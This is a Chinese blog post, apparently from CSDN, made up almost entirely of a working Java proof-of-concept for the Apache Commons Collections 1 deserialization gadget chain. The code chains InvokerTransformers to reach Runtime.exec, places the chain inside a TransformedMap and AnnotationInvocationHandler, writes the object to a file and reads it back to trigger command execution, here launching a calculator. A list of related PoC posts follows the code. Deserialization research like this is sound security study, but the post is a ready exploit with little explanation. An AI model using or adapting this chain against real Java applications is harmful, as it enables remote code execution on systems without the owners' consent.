【Java反序列化】CC1调用链poc

已于 2022-04-24 21:41:07 修改
阅读量2k 收藏
点赞数
分类专栏: Java反序列化 文章标签: 网络安全
于 2022-04-24 21:40:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61572518/article/details/124392673
版权 
package demo3.cc1;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.crypto.dsig.Transform;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class CC1 {
    public static void main(String[] args) throws Exception {

//        Runtime.getRuntime().exec("calc");
//        Runtime runtime = Runtime.getRuntime();
//        Class clazz = Runtime.class;
//        Method execMethod = clazz.getMethod("exec", String.class);
//        execMethod.invoke(runtime,"calc");

//        Method getRuntimeMethod = (Method) new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}).transform(Runtime.class);
//        Runtime runtime = (Runtime) new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,null}).transform(getRuntimeMethod);
//        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(runtime);

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}),
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

//        Class clazz = Runtime.class;
//        Method getRuntimeMethod1 = clazz.getMethod("getRuntime", null);
//        Runtime runtime = (Runtime) getRuntimeMethod1.invoke(null, null);
//        Method execMethod = clazz.getMethod("exec", String.class);
//        execMethod.invoke(runtime, "calc");

//        InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
//        invokerTransformer.transform(runtime);
        HashMap<Object, Object> map = new HashMap<>();
        map.put("value", "value");
        Map<Object, Object> transformedMap = TransformedMap.decorate(map, null, chainedTransformer);

        Class<?> clazz1 = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> annotationInvocationHandlerConstructor = clazz1.getDeclaredConstructor(Class.class, Map.class);
        annotationInvocationHandlerConstructor.setAccessible(true);
        Object object = annotationInvocationHandlerConstructor.newInstance(Target.class,transformedMap);

        //Entry代表一个键值对
//        for (Map.Entry entry : transformedMap.entrySet()) {
//            entry.setValue(runtime);
//        }

        FileOutputStream fileOutputStream = new FileOutputStream("cc1.bin");
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
        objectOutputStream.writeObject(object);
        fileOutputStream.close();
        objectOutputStream.close();

        FileInputStream inputStream = new FileInputStream("cc1.bin");
        ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
        objectInputStream.readObject();
        objectInputStream.close();
        inputStream.close();
        
    }
}

xbpan_sec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic反序列化补丁绕过poc
04-21
反序列化补丁绕过poc。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
Android上的Java对象反序列化-Android开发
05-26
Android Java反序列化漏洞测试仪关于本项目包含旨在测试和创建Andr中Java反序列化漏洞概念验证(PoC)漏洞的工具的Android应用Android Java反序列化漏洞测试仪关于本项目包括旨在作为Android应用程序的Android应用程序。用于测试和创建针对Android中Java反序列化漏洞的概念验证(PoC)漏洞的工具。 它基于frohoff的ysoserial,但以Android平台为目标。 该项目由modzero(@ mod0)的Jan Girlich(@ vollkorn1982)开发。 背景Java反序列化漏洞是一个长期以来广为研究的主题。 从本质上讲,
cve-2017-10271-poc.py weblogic反序列化 WLS
01-02
python2.x 最新weblogic反序列化漏洞利用工具 WLS /wls-wsat/CoordinatorPortType
shiro反序列化脚本.zip
07-28
需要用到的俩个文件 ysoserial-master.jar 和 poc.py
java poc_spring系列cve poc编写
weixin_33880392的博客
02-13 1079
本来是自己写在有道云笔记的,存粹是为了练习下python代码,也懒得打码了就是自己搭建的个漏测环境,师傅们手下留情.0x01 cve-2018-12731.1 漏洞检测访问目标/users?page=&size=5抓包,修改post包POST /users?page=&size=5 HTTP/1.1Host: 49.235.54.135:24814User-Agent: Mozil...
高效开发:Java 反序列化漏洞 POC
YakProject的博客
11-24 213
首先在yakit内置dnslog服务申请一个域名,再打开webfuzzer,使用yso:dnslog标签配合dnslog域名爆破可用,如图,右侧可以看到payload为:CommonsCollections3 dnslog evil class xxx.dgrh3.cn,在yakit右上角的 "漏洞与风险" 收到了反连提醒,说明目标成功加载了class。yaklang的java基础设施基本可以满足编写POC、EXP的需求,可以使用yakit的反连、Yso-Java Hack辅助脚本编写,可以提升效率。
java反序列化漏洞 poc_Java反序列化漏洞详解
weixin_39812142的博客
02-13 953
Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。本文对于Java反序列化的漏洞简述后,并对于Java反序列化Poc进行详细解读。Java反序列化漏洞简介· Java序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,Java中的ObjectOutputStream类的writeObject()方法可以实现序列...
Javaweb安全——反序列化漏洞- CC1
weixin_43610673的博客
05-24 1174
Common-Collections利用1 第一次接触反序列化漏洞时写的初识Java反序列化漏洞这篇文章当中已经分析过一遍Common-Collections的两条子(分别用的TransformedMap和LazyMap构造恶意对象反射,AnnotationInvocationHandler(CC1)和BadAttributeValueExpException(CC5)调用transform())。这次从Common-Collections1开始再捋一遍,顺便自己写一遍exp加深印象。 本文环境为jd
直播预告 | 今晚8点 1小时教会使用Java编写POC
Ms08067安全实验室
01-07 114
— 实验室旗下直播培训课程 —来和20000+位同学加入MS08067一起学习吧!
JavaPOC:概念证明
05-26
JavaPOC 概念验证:Apache HttpComponents获得请求,Junit,JMockit,Basic Maven POM,还更多地暴露于.gitignore概念 还包括Java 7+ try-with-resources语句,该语句关闭所有可关闭的资源,而不必将它们放在finally块中。 我学到的有趣的东西 在JMockit中,“严格”的期望值与“非严格期望值”相对应。 使用“严格”时,预期代码行为的顺序非常重要。 模拟系统时间是一项艰巨的任务。 我花了很多研究才能了解如何在JMockit中仅模拟一个方法System.currentTimeMillis() 。 我陷入的陷阱是模拟了整个System.class ,导致了类似13的系统方法调用,我模拟了13个响应,直到找到了模拟对currentTimeMillis()的响应的方法 我首先在类路径中包含.jar文件,直到能
java-poc
03-11
java-poc
java-poc:概念证明和Java技巧
04-30
注意: : 优先级警告...使用 Khallware(Java概念验证) 概述 这是一些用Java编写的简单,独立的概念证明。 主题包括: -简单的Java构造,data_types和语言功能 -通用软件设计模式 -计算机科学算法 -各种核心Java技术 -j2ee技术的各种子集 -通用Java
CC1分析
sunyufei_666的博客
06-15 244
第一个是memberType类型不为空值,这里type是传入的Override.class,annotationType.memberTypes()为调用出入class的成员方法,所以,传入的class类中必须存在成员方法,且成员变量的key值必须与map中的key值相同,而Override.class的成员方法为空值,所以这里可以选择Target.class作为参数。这里有两个if,如果这两个if的条件为false时,无法调用里面的setValue方法。
CC1-LazyMap利用-源码分析
yuan_boss的博客
08-15 151
这个其实和我上一篇文章的CC1大致思路是一样的,主要特殊就在于利用了动态代理中自动调用InvocationHandler对象的invoke方法,从而调用到我们可以利用的get()方法。
一文带你搞懂CC1(小白入门必看文章)
maple_leaf
12-03 1834
CC是利用Java反序列化漏洞进行攻击的一种方式。CC利用Apache Commons Collections库中的Transformer接口的实现类,通过巧妙的设计,将恶意代码序列化为一个对象,然后将该对象传递给一个反序列化函数,从而触发恶意代码的执行。
[Java安全入门]三.CC1
qq_34942239的博客
03-09 1227
Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强大的数据结构类型和实现了各种集合工具类。Commons Collections触发反序列化漏洞构造的叫做cc,构造方式多种,这里先学习cc1
Java安全入门(二)——CC1 分析+详解
热门推荐
weixin_45808483的博客
01-29 1万+
背景 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。 从Apache CommonsCollections 说起。 Apache C...
【入坑JAVA安全】手把手教你写反序列化POC
一个安全研究员
04-15 1926
要是你是妹子就更好了~
phar反序列化poc
最新发布
05-21
一个简单的Phar反序列化POC如下: ``` class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('(); ?>'); $example = new Example(); $example->...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值